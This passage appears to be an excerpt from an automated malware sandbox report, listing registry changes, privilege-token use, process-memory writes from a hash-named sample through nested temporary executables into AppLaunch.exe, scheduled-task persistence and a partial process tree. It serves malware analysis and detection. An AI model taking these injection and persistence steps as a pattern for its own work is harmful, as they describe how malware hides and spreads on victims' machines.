Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-2751 = "Tomsk Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1501 = "Turkey Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-2492 = "Aus Central W. Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1802 = "Line Islands Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-72 = "Newfoundland Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-691 = "Tasmania Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\CD18.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\source1.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of UnmapMainImage

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3960 wrote to memory of 3652 N/A C:\Users\Admin\AppData\Local\Temp\da66fedd7831c720e47597fda2295ebcb868479b9c21bc86646c523b99e3233c.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v7002600.exe
PID 3960 wrote to memory of 3652 N/A C:\Users\Admin\AppData\Local\Temp\da66fedd7831c720e47597fda2295ebcb868479b9c21bc86646c523b99e3233c.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v7002600.exe
PID 3960 wrote to memory of 3652 N/A C:\Users\Admin\AppData\Local\Temp\da66fedd7831c720e47597fda2295ebcb868479b9c21bc86646c523b99e3233c.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v7002600.exe
PID 3652 wrote to memory of 3824 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v7002600.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a4248824.exe
PID 3652 wrote to memory of 3824 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v7002600.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a4248824.exe
PID 3652 wrote to memory of 3824 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v7002600.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a4248824.exe
PID 3824 wrote to memory of 2560 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a4248824.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3824 wrote to memory of 2560 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a4248824.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3824 wrote to memory of 2560 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a4248824.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3824 wrote to memory of 2560 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a4248824.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3824 wrote to memory of 2560 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a4248824.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3824 wrote to memory of 2560 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a4248824.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3652 wrote to memory of 3532 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v7002600.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b0070557.exe
PID 3652 wrote to memory of 3532 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v7002600.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b0070557.exe
PID 3652 wrote to memory of 3532 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v7002600.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b0070557.exe
PID 3532 wrote to memory of 5012 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b0070557.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3532 wrote to memory of 5012 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b0070557.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3532 wrote to memory of 5012 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b0070557.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3532 wrote to memory of 5012 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b0070557.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3532 wrote to memory of 5012 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b0070557.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3532 wrote to memory of 5012 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b0070557.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3532 wrote to memory of 5012 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b0070557.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3532 wrote to memory of 5012 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b0070557.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3532 wrote to memory of 5012 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b0070557.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3532 wrote to memory of 5012 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b0070557.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3960 wrote to memory of 3240 N/A C:\Users\Admin\AppData\Local\Temp\da66fedd7831c720e47597fda2295ebcb868479b9c21bc86646c523b99e3233c.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\c3174991.exe
PID 3960 wrote to memory of 3240 N/A C:\Users\Admin\AppData\Local\Temp\da66fedd7831c720e47597fda2295ebcb868479b9c21bc86646c523b99e3233c.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\c3174991.exe
PID 3960 wrote to memory of 3240 N/A C:\Users\Admin\AppData\Local\Temp\da66fedd7831c720e47597fda2295ebcb868479b9c21bc86646c523b99e3233c.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\c3174991.exe
PID 2636 wrote to memory of 3416 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\C4C7.exe
PID 2636 wrote to memory of 3416 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\C4C7.exe
PID 2636 wrote to memory of 3416 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\C4C7.exe
PID 3416 wrote to memory of 2168 N/A C:\Users\Admin\AppData\Local\Temp\C4C7.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\OV6MR7Yw.exe
PID 3416 wrote to memory of 2168 N/A C:\Users\Admin\AppData\Local\Temp\C4C7.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\OV6MR7Yw.exe
PID 3416 wrote to memory of 2168 N/A C:\Users\Admin\AppData\Local\Temp\C4C7.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\OV6MR7Yw.exe
PID 2168 wrote to memory of 664 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\OV6MR7Yw.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\bf6Dw9Ui.exe
PID 2168 wrote to memory of 664 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\OV6MR7Yw.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\bf6Dw9Ui.exe
PID 2168 wrote to memory of 664 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\OV6MR7Yw.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\bf6Dw9Ui.exe
PID 2636 wrote to memory of 944 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\C6DB.exe
PID 2636 wrote to memory of 944 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\C6DB.exe
PID 2636 wrote to memory of 944 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\C6DB.exe
PID 664 wrote to memory of 4140 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\bf6Dw9Ui.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\fZ8WR0am.exe
PID 664 wrote to memory of 4140 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\bf6Dw9Ui.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\fZ8WR0am.exe
PID 664 wrote to memory of 4140 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\bf6Dw9Ui.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\fZ8WR0am.exe
PID 4140 wrote to memory of 3532 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\fZ8WR0am.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\bt4xT1rz.exe
PID 4140 wrote to memory of 3532 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\fZ8WR0am.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\bt4xT1rz.exe
PID 4140 wrote to memory of 3532 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\fZ8WR0am.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\bt4xT1rz.exe
PID 3532 wrote to memory of 4528 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\bt4xT1rz.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1DQ73CJ8.exe
PID 3532 wrote to memory of 4528 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\bt4xT1rz.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1DQ73CJ8.exe
PID 3532 wrote to memory of 4528 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\bt4xT1rz.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1DQ73CJ8.exe
PID 2636 wrote to memory of 3696 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\C8EF.bat
PID 2636 wrote to memory of 3696 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\C8EF.bat
PID 2636 wrote to memory of 3696 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\C8EF.bat
PID 944 wrote to memory of 1688 N/A C:\Users\Admin\AppData\Local\Temp\C6DB.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 944 wrote to memory of 1688 N/A C:\Users\Admin\AppData\Local\Temp\C6DB.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 944 wrote to memory of 1688 N/A C:\Users\Admin\AppData\Local\Temp\C6DB.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 944 wrote to memory of 1688 N/A C:\Users\Admin\AppData\Local\Temp\C6DB.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 944 wrote to memory of 1688 N/A C:\Users\Admin\AppData\Local\Temp\C6DB.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 944 wrote to memory of 1688 N/A C:\Users\Admin\AppData\Local\Temp\C6DB.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 944 wrote to memory of 1688 N/A C:\Users\Admin\AppData\Local\Temp\C6DB.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 944 wrote to memory of 1688 N/A C:\Users\Admin\AppData\Local\Temp\C6DB.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 944 wrote to memory of 1688 N/A C:\Users\Admin\AppData\Local\Temp\C6DB.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 944 wrote to memory of 1688 N/A C:\Users\Admin\AppData\Local\Temp\C6DB.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4528 wrote to memory of 4964 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1DQ73CJ8.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4528 wrote to memory of 4964 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1DQ73CJ8.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\da66fedd7831c720e47597fda2295ebcb868479b9c21bc86646c523b99e3233c.exe

"C:\Users\Admin\AppData\Local\Temp\da66fedd7831c720e47597fda2295ebcb868479b9c21bc86646c523b99e3233c.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v7002600.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v7002600.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a4248824.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a4248824.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 3824 -ip 3824

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3824 -s 148

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b0070557.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b0070557.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 3532 -ip 3532

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3532 -s 148

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 5012 -ip 5012

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5012 -s 540

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\c3174991.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\c3174991.exe

C:\Users\Admin\AppData\Local\Temp\C4C7.exe

C:\Users\Admin\AppData\Local\Temp\C4C7.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\OV6MR7Yw.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\OV6MR7Yw.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\bf6Dw9Ui.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\bf6Dw9Ui.exe

C:\Users\Admin\AppData\Local\Temp\C6DB.exe

C:\Users\Admin\AppData\Local\Temp\C6DB.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\fZ8WR0am.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\fZ8WR0am.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\bt4xT1rz.exe

